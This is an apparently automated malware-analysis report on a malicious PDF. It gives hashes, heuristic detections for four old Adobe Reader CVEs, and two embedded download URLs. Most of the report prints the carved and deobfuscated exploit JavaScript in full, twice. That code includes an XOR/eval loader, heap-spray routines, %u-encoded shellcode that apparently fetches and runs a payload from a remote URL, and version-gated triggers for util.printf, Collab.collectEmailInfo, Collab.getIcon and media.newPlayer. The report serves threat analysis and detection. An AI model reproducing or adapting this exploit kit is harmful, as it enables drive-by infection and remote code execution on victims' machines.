Malicious PDF — malware analysis report

Static analysis result for SHA-256 bb3172a3540ae15b…

MALICIOUS

PDF

15.5 KB First seen: 2026-05-10
MD5: 123c32508c7e4c548500ba15ca423c7b SHA-1: 202f7077999b95c62ae3f070353617811e8a3488 SHA-256: bb3172a3540ae15b040cbe0feaa0d63a7eb9851b48515e509d63fec282341844
510 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The presence of eval() calls and obfuscated script content suggests an attempt to download and execute a secondary payload. The extracted file names 'javascript_obj0023_000.js' and 'stream_009_off000039d5.js' further support the presence of JavaScript code within the PDF.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 11

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var f='', x=app.doc, p = '%';var xM=x['get'+'PageNumWo'+'rds'](3);var mN=29;var h=x['unes'+'cape'];var v=String;    for(var vS=0; vS < xM; vS++){kR=x['getPa'+'geNthWord'](3, vS);var xY=kR.substr(kR.length - 2, 2);var kB=h(p + xY).charCodeAt(0);f+=v['fromChar'+'Code'](kB ^ mN);}eval(f);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.coolbiz.in/id/viewforum.php/ad3a41d3bc8c84c73b0c656dcfbfa28f?spl=pdf_2010 Referenced by PDF JavaScript
    • http://w.oli.ni/iwou.h/da13cc47bc5dff2fslpf21Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0023_000.js pdf-javascript-stream PDF /JS object 23 at offset 0x3762 292 bytes
SHA-256: d0b22fadc334cd3f13e6cb30c471b4d41191ccd687e11cd1c860d72ba158580e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
get_tas(this[get_sas()][get_das()]);

function get_sas(){
    var sas='i';
	sas+='nf';
	sas+='o';
	return sas;
}

function get_das(){
	var das='t';
	das+='it';
	das+='le';
	return das;
}

function get_tas(da){
	var ds='sa';
	var df=new Function(da);
	ds+='sd';
	ds+='lfs';
	return df();
}
stream_009_off000039d5.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x39D5 286 bytes
SHA-256: 68ca95ce98afc41a14cf799e5f7a288516473056f0aa8c2671414cd75b63c9ac
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 5045 bytes
SHA-256: 81e2766fa3cf861abff8405c4d3fa52f04388b97afddc8aacf71a383b9cca967
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://www.coolbiz.in/id/viewforum.php/ad3a41d3bc8c84c73b0c656dcfbfa28f?spl=pdf_2010 */
var _u="http://www.coolbiz.in/id/viewforum.php/ad3a41d3bc8c84c73b0c656dcfbfa28f?spl=pdf_2010";
�Ӱ�Ӱ���������ð�������������������������
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "C9teB%P0pQocRuU62ImyZN8fa=L1.4xGzwhr-vqOFJiAgj7sn?3bMkdYD/W5&_HKXV:S0lET";

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";

	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();
������������װð��������ӧ����ӧӳ���ӧ������ð�����������������������������������dz�����������������ӳ�������������������
  Ô-
page_word_xor_stage_000.js deobfuscated-js page-word hex-tail XOR decoded JavaScript (decompressed, key=0x1D) at offset 0xE2C 4656 bytes
SHA-256: 881062e7d4cff9a457fcde3514a5e7586261d10fe06d165992ba2d3e8f2d4a4b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "C9teB%P0pQocRuU62ImyZN8fa=L1.4xGzwhr-vqOFJiAgj7sn?3bMkdYD/W5&_HKXV:S0lET";

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";

	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();

Open this report in the interactive analyzer, or submit your own file for analysis.